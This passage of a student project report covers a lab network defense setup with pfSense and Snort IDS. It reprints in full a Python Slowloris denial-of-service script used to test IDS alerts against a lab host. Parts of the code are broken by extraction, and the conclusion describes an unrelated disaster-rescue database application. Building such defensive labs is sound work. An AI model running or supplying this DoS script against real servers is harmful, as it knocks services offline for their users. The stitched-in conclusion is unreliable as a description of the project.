 Generates logs and alerts in real time during attack scenarios for analysis.

Dept. of CSD, SJCIT 24 2024-2025

Advance network Defense Systems with IDS System Design

REAL-TIME TRAFFIC MONITORING:

 Uses Snort and pfSense’s monitoring features to provide live traffic analysis, allowing the user
to see the current state of the network.
 Displays inbound and outbound network traffic, highlighting any unusual patterns or potential
threats.
 Generates a report with detailed traffic data for further analysis.

ALERTS AND LOGS GENERATION:

 Configures alerts in pfSense and Snort to notify administrators of suspicious activities.

 Logs important events such as firewall rule violations, detected intrusions, and attack
simulations.
 Provides logs in both a textual format and as visual alerts for easy interpretation by
administrators.

DATA ANALYSIS AND VISUALIZATION:

 Collects data from Snort logs, pfSense traffic reports, and attack simulations.
 Uses Python’s data analysis libraries (e.g., pandas, matplotlib) to generate insights and visual
representations of network activity and security status.
 Provides detailed graphs, tables, and charts to monitor the network's health and the effectiveness
of security measures.

figure 6.1: NetSpartan script initiation

6.3 Source Code for DOS attack initiation in python

import argparse
import logging
import random
import socket
import sys
import time

parser = argparse.ArgumentParser(
description="Slowloris, low bandwidth stress test tool for websites"
)
parser.add_argument("host", nargs="?", help="Host to perform stress test on")
parser.add_argument(
"-p", "--port", default=80, help="Port of webserver, usually 80", type=int
)
parser.add_argument(

Dept. of CSD, SJCIT 25 2024-2025

Advance network Defense Systems with IDS System Design

"-s",
"--sockets",
default=150,
help="Number of sockets to use in the test",
type=int,
)
parser.add_argument(
"-v",
"--verbose",
dest="verbose",

action="store_true",
help="Increases logging",
)
parser.add_argument(
"-ua",
"--randuseragents",
dest="randuseragent",
action="store_true",
help="Randomizes user-agents with each request",
)
parser.add_argument(
"-x",
"--useproxy",
dest="useproxy",
action="store_true",
help="Use a SOCKS5 proxy for connecting",
)
parser.add_argument(
"--proxy-host", default="127.0.0.1", help="SOCKS5 proxy host"
)
parser.add_argument(
"--proxy-port", default="8080", help="SOCKS5 proxy port", type=int
)
parser.add_argument(
"--https",
dest="https",
action="store_true",
help="Use HTTPS for the requests",
)
parser.add_argument(
"--sleeptime",
dest="sleeptime",
default=15,
type=int,
help="Time to sleep between each header sent.",
)
parser.set_defaults(verbose=False)
parser.set_defaults(randuseragent=False)
parser.set_defaults(useproxy=False)
parser.set_defaults(https=False)

Dept. of CSD, SJCIT 26 2024-2025

Advance network Defense Systems with IDS System Design

args = parser.parse_args()
if len(sys.argv) <= 1:
parser.print_help()
sys.exit(1)

if not args.host:
print("Host required!")
parser.print_help()
sys.exit(1)

if args.useproxy:
# Tries to import to external "socks" library
# and monkey patches socket.socket to connect over
# the proxy by default
try:
import socks

socks.setdefaultproxy(
socks.PROXY_TYPE_SOCKS5, args.proxy_host, args.proxy_port
)
socket.socket = socks.socksocket
logging.info("Using SOCKS5 proxy for connecting...")
except ImportError:
logging.error("Socks Proxy Library Not Available!")
sys.exit(1)

logging.basicConfig(
format="[%(asctime)s] %(message)s",
datefmt="%d-%m-%Y %H:%M:%S",
level=logging.DEBUG if args.verbose else logging.INFO,
)

def send_line(self, line):

line = f"{line}\r\n"
self.send(line.encode("utf-8"))

def send_header(self, name, value):

self.send_line(f"{name}: {value}")

if args.https:
logging.info("Importing ssl module")
import ssl

setattr(ssl.SSLSocket, "send_line", send_line)

setattr(ssl.SSLSocket, "send_header", send_header)

list_of_sockets = []
user_agents = [
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML,
like Gecko) Chrome/53.0.2785.143 Safari/537.36",

Dept. of CSD, SJCIT 27 2024-2025

Advance network Defense Systems with IDS System Design

"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML,

like Gecko) Chrome/54.0.2840.71 Safari/537.36",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/602.1.50 (KHTML,
like Gecko) Version/10.0 Safari/602.1.50",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:49.0) Gecko/20100101
Firefox/49.0",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML,
like Gecko) Chrome/53.0.2785.143 Safari/537.36",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML,
like Gecko) Chrome/54.0.2840.71 Safari/537.36",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/537.36 (KHTML,
like Gecko) Chrome/54.0.2840.71 Safari/537.36",

"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/602.2.14 (KHTML,

like Gecko) Version/10.0.1 Safari/602.2.14",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12) AppleWebKit/602.1.50 (KHTML,
like Gecko) Version/10.0 Safari/602.1.50",
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393",
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/53.0.2785.143 Safari/537.36",
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/54.0.2840.71 Safari/537.36",
"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/53.0.2785.143 Safari/537.36",
"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/54.0.2840.71 Safari/537.36",
"Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0",
"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/53.0.2785.143 Safari/537.36",
"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/54.0.2840.71 Safari/537.36",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/53.0.2785.143 Safari/537.36",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/54.0.2840.71 Safari/537.36",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0",
"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko",
"Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0",
"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/53.0.2785.143 Safari/537.36",
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko)
Chrome/53.0.2785.143 Safari/537.36",
"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:49.0) Gecko/20100101 Firefox/49.0",
]

setattr(socket.socket, "send_line", send_line)

setattr(socket.socket, "send_header", send_header)

def init_socket(ip: str):

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(4)

Dept. of CSD, SJCIT 28 2024-2025

Advance network Defense Systems with IDS System Design

if args.https:
ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
s = ctx.wrap_socket(s, server_hostname=args.host)

s.connect((ip, args.port))

s.send_line(f"GET /?{random.randint(0, 2000)} HTTP/1.1")

ua = user_agents[0]

if args.randuseragent:
ua = random.choice(user_agents)

s.send_header("User-Agent", ua)
s.send_header("Accept-language", "en-US,en,q=0.5")
return s

def slowloris_iteration():
logging.info("Sending keep-alive headers...")
logging.info("Socket count: %s", len(list_of_sockets))

# Try to send a header line to each socket

for s in list(list_of_sockets):
try:
s.send_header("X-a", random.randint(1, 5000))
except socket.error:
list_of_sockets.remove(s)

# Some of the sockets may have been closed due to errors or timeouts.
# Re-create new sockets to replace them until we reach the desired number.

diff = args.sockets - len(list_of_sockets)

if diff <= 0:
return

logging.info("Creating %s new sockets...", diff)

for _ in range(diff):
try:
s = init_socket(args.host)
if not s:
break

def main():
ip = args.host
socket_count = args.sockets
logging.info("Attacking %s with %s sockets.", ip, socket_count)

logging.info("Creating sockets...")
for _ in range(socket_count):
try:

Dept. of CSD, SJCIT 29 2024-2025

Advance network Defense Systems with IDS System Design

logging.debug("Creating socket nr %s", _)

s = init_socket(ip)
except socket.error as e:
logging.debug(e)
break
list_of_sockets.append(s)

while True:
try:
slowloris_iteration()
except (KeyboardInterrupt, SystemExit):
logging.info("Stopping Slowloris")
break
except Exception as e:
logging.debug("Error in Slowloris iteration: %s", e)
logging.debug("Sleeping for %d seconds", args.sleeptime)
time.sleep(args.sleeptime)

if __name__ == "__main__":
main()

Dept. of CSD, SJCIT 30 2024-2025

Advance network Defense Systems with IDS System Design

figure 6.2: Source rules for Snort (IDS)

Figure 6.3: example of defined rules in Snort.

Dept. of CSD, SJCIT 31 2024-2025

CHAPTER 7

TESTING

7.1 METHODS OF TESTING

➢ Testing is an essential process in software development, with the goal of ensuring

the system works as expected and is free from errors. Here are several testing types
commonly applied in the development of an effective project:

SOURCE CODE TESTING

Objective: Examines the logic of the system.

Purpose: Ensures that the output generated is as expected by the user. If the output matches
the requirement, the logic is considered correct.

SPECIFICATION TESTING

Objective: Compares system performance with specified requirements.

Purpose: Evaluates the system’s behavior under various conditions, ensuring that it adheres
to the expected functionality and performance.

MODULE LEVEL TESTING

Objective: Tests individual modules of the system.

Purpose: Identifies errors within specific modules, allowing programmers to fix them
without affecting other parts of the system.

UNIT TESTING

Objective: Focuses on testing the smallest unit or module of the software.

Purpose: Verifies the integrity of local data structures and ensures correct functionality at
boundary conditions. It tests the behavior of each unit in isolation, ensuring correctness
during execution.

38
Advance network Defense Systems with IDS Testing

SECURITY TESTING
Objective: Assesses the system's performance under different conditions.

Purpose: Tests the software’s runtime performance and efficiency. It often includes stress
testing to ensure the system can handle peak loads and continues to operate smoothly under
extreme conditions.

PERFORMANCE TESTING
Objective: Verifies the system’s security features.

Purpose: Ensures that the system is protected from unauthorized access or attacks. It involves
testing defenses like password protection, error handling, and resistance to penetration attempts.

OUTPUT TESTING
Objective: Verifies the system produces the correct output.

Purpose: Ensures that the system generates the required output in the correct format, whether
on screen or through a printer. It checks for accuracy, formatting, and compliance with user
specifications.

USER ACCEPTANCE TESTING

Objective: Confirms that the system meets user expectations.

Purpose: Involves testing the system with real users to ensure it meets their needs. Changes
and adjustments are made based on user feedback during development. It ensures that the
system is ready for deployment and accepted by the end-users.

7.2 UNIT TESTING

Unit Testing is one of the fundamental types of testing in software development. It focuses on
validating the smallest unit or component of the software, typically a function or method, to
ensure that it performs its intended task correctly. Unit tests are usually written by developers
during the development process to validate their code as they work. This makes unit testing a
proactive approach to identifying and fixing errors early in the development lifecycle.

OBJECTIVES OF UNIT TESTING

 Verify correctness: The primary goal of unit testing is to ensure that individual units of
the software behave as expected, based on predefined inputs and expected outputs.

 Isolate components: Unit tests focus on testing a single unit in isolation from the rest of
the system, ensuring that dependencies do not affect the test results.

Dept. of CSD, SJCIT 33 2024-2025

Advance network Defense Systems with IDS Testing

 Identify bugs early: By testing each component as it's developed, bugs and issues can be
caught early, reducing the cost of fixing defects later in the development process.

 Simplify debugging: Since unit tests are focused on small code segments, they make it
easier to pinpoint where a bug occurs, facilitating quicker debugging.

KEY FEATURES OF UNIT TESTING

1. Isolation: Unit tests are designed to isolate the unit being tested from the rest of the
system. External dependencies like databases, file systems, or networks are mocked or
stubbed.

2. Automation: Unit tests are automated, allowing them to be run frequently during
development to check if changes to the code break existing functionality.

3. Fast Feedback: Unit tests provide quick feedback, allowing developers to check if their
code works as expected after each change.

4. Reusability: Once written, unit tests can be reused across different stages of
development and even in future projects to test similar components.

5. Small Scope: Unit testing focuses on testing small, isolated parts of the system (often
individual functions or methods), rather than the entire application.

BENEFITS OF UNIT TESTING

 Improved Code Quality: By verifying that individual components work as expected,

unit testing helps improve the overall quality and robustness of the codebase.

 Easier Refactoring: With a solid suite of unit tests, developers can safely refactor code,
knowing that any unintended changes to functionality will be caught by the tests.

 Documentation: Unit tests can serve as a form of documentation, demonstrating how

specific functions or methods are intended to behave.

 Reduction in Costs: Catching errors early with unit tests can significantly reduce the
cost of fixing bugs that would otherwise go unnoticed until later stages of development.

 Faster Debugging: Since unit tests are designed to check small code segments, they can
help identify the exact location of a bug quickly, simplifying the debugging process.

BEST PRACTICES FOR UNIT TESTING

 Keep tests independent: Each test should be independent of others, ensuring that tests
do not rely on each other’s results.

 Test one thing at a time: A unit test should verify one specific behavior or logic to avoid
confusion and make debugging easier.

 Use descriptive names: Unit test names should clearly indicate the purpose of the test,
making it easy to understand what is being verified.

Dept. of CSD, SJCIT 34 2024-2025

 Advance network Defense Systems with IDS Testing

 Test edge cases: Include tests for boundary conditions and edge cases, such as null
inputs, empty strings, or invalid data, to ensure the system behaves correctly under all
scenarios.

 Mock external dependencies: Use mocks or stubs to simulate external dependencies

such as databases or external services, ensuring that the unit test focuses solely on the
component being tested.

Performing a port scan with NMAP on the target machine 192.168.2.4

figure 7.1: NMAP scan results

Alerts on IDS console for NMAP port scan

figure 7.2: Console alert response

Performing a DOS attack on the target machine 192.168.2.4

figure 7.3: DOS attack initiation

Dept. of CSD, SJCIT 35 2024-2025

 Advance network Defense Systems with IDS Testing

DOS attack alerts on the IDS console from the attacking machine.

figure 7.4: IDS alerts for DOS

Dept. of CSD, SJCIT 36 2024-2025

 CHAPTER 8

CONCLUSION AND FUTURE WORKS

In conclusion, the development of an application serving as a centralized database for rescue
agencies is a transformative step toward improving disaster response and coordination. By
enabling the registration of agencies along with their information, including location, contact
details, and areas of expertise, this application holds the potential to greatly enhance the efficiency
and effectiveness of rescue operations.
Incorporating features like map visualization, filtering options, and integrated communication tools
allows agencies to collaborate seamlessly, share resources, and respond to emergencies with
greater speed and precision. The application’s success, however, relies on implementing robust
security and privacy measures to safeguard sensitive data and restrict access to authorized
personnel only.
As the world faces an increasing frequency of natural and man-made disasters, such a tool
becomes invaluable in saving lives and mitigating the impact of crises. Its development
underscores the critical role of technology in advancing disaster management and relief efforts,
ultimately contributing to a more resilient and prepared society.

8.1 FUTURE WORKS

Advanced Communication & Collaboration Tools

Develop features like real-time video and audio communication, collaborative mapping tools with
shared annotations, and integration with drone footage. These enhancements will provide improved
situational awareness and enable seamless remote coordination during disaster response.

Citizen Integration
Introduce functionality for trained citizens to register and contribute their expertise, such as first aid
or language translation, to disaster relief efforts. This will require robust verification processes and
training modules to ensure reliability and safety, thereby expanding the rescue network's capacity.

Predictive Analytics
Incorporate AI-driven predictive analytics to analyze historical disaster data and real-time
environmental factors. This feature can help identify potential disaster zones, enabling rescue
agencies to pre-position resources and enhance preparedness for emergencies.

Offline Functionality
Develop offline capabilities to ensure the application remains operational in areas with limited or no
internet connectivity. Features such as pre-downloaded maps, cached information on rescue
agencies, and offline communication protocols will be crucial for maintaining functionality in critical
situations.

These future enhancements aim to make the application more resilient, inclusive, and effective in
addressing diverse challenges during disaster management, further solidifying its role as a vital tool
for rescue operations.
37
 BIBLIOGRAPHY

[1] Graham, J., & Murphy, P. (2019). "Cybersecurity: A Practical Guide to Threats,
Vulnerabilities, and Countermeasures. This government document outlines the evolution
of network threats and discusses how layered security, including firewalls and IDS, can
improve network resilience.

[2] Baker, S., & Oppenheimer, C. (2018). "Firewall and IDS Integration for Enterprise
Security." A textbook that discusses the complementary roles of firewalls and IDS in
network security, emphasizing the need for layered defenses.

[3] Punith Kumar M B, Sumanth S, Manikant Amaresh Savadatti, “Internet Rescue Robots
for Disaster Management ” Published on 08 April 2021

[4] Orebaugh, A., & Ramirez, J. (2013). "Wireshark & Ethereal Network Protocol Analyzer
Toolkit." Specifically focuses on how tools like Wireshark provide detailed insights into
network behavior, helping identify and understand security threats.

38
APPENDIX A:

List of Acronyms and Abbreviations

 IDS: Intrusion Detection System
 IPS: Intrusion Prevention System
 IoT: Internet of Things
 VPN: Virtual Private Network
 IP: Internet Protocol
 DNS: Domain Name System
 SSL: Secure Sockets Layer
 GUI: Graphical User Interface

Glossary of Terms
 Firewall: A network security system that monitors and controls incoming and outgoing traffic
based on predetermined security rules.
 Intrusion Detection System (IDS): A system that monitors network traffic for suspicious
activity and alerts the user when potential threats are detected.
 Packet Filtering: A method to control network access by monitoring outgoing and incoming
packets and allowing or blocking them based on source and destination IP addresses,
protocols, or ports.
 Virtual Lab: A simulated environment that mimics real-world network configurations for
testing and training.

Software and Tools Used

 Virtualization Platform: VMware/VirtualBox for setting up virtual environments
 Firewall: pfSense for traffic filtering and access control
 IDS: Snort for intrusion detection
 Penetration Testing Tools: Kali Linux for simulating attacks
 Programming Language: Python for custom scripting and automation
 Monitoring Tools: Wireshark for packet analysis
APPENDIX B:

Hardware Requirements
 Minimum System Configuration:
o Processor: Intel Core i5 or equivalent
o RAM: 8GB or higher
o Storage: 50GB free space
 Network Setup:
o Virtual network interfaces for simulating multiple devices and subnets
o A reliable internet connection for downloading tools and updates

Application
1. pfSense Dashboard
o Displays traffic logs, firewall rules, and network statistics.
2. Snort Alerts
o Shows intrusion detection alerts with timestamps and threat details.
3. Attack Simulation
o Visual depiction of a penetration test using Kali Linux tools.
4. Network Topology
o A graphical representation of the simulated network setup.

Challenges and Limitations

 False Positives: IDS systems often generate false alarms, which require manual analysis.
 Resource Constraints: Running multiple virtual machines may strain lower-end hardware.
 Scalability: Simulating large-scale attacks or networks might need additional resources.
 Learning Curve: Complex tools like Snort and pfSense require training to use effectively.

Future Work Details

1. Advanced Threat Detection: Incorporating AI to detect zero-day attacks and improve intrusion
detection accuracy.
2. IoT Security: Expanding the system to include IoT device protection with custom rules.
3. Cloud Integration: Setting up cloud-based intrusion detection for hybrid environments.
4. User Training Modules: Adding interactive tutorials for users to understand network security
practices.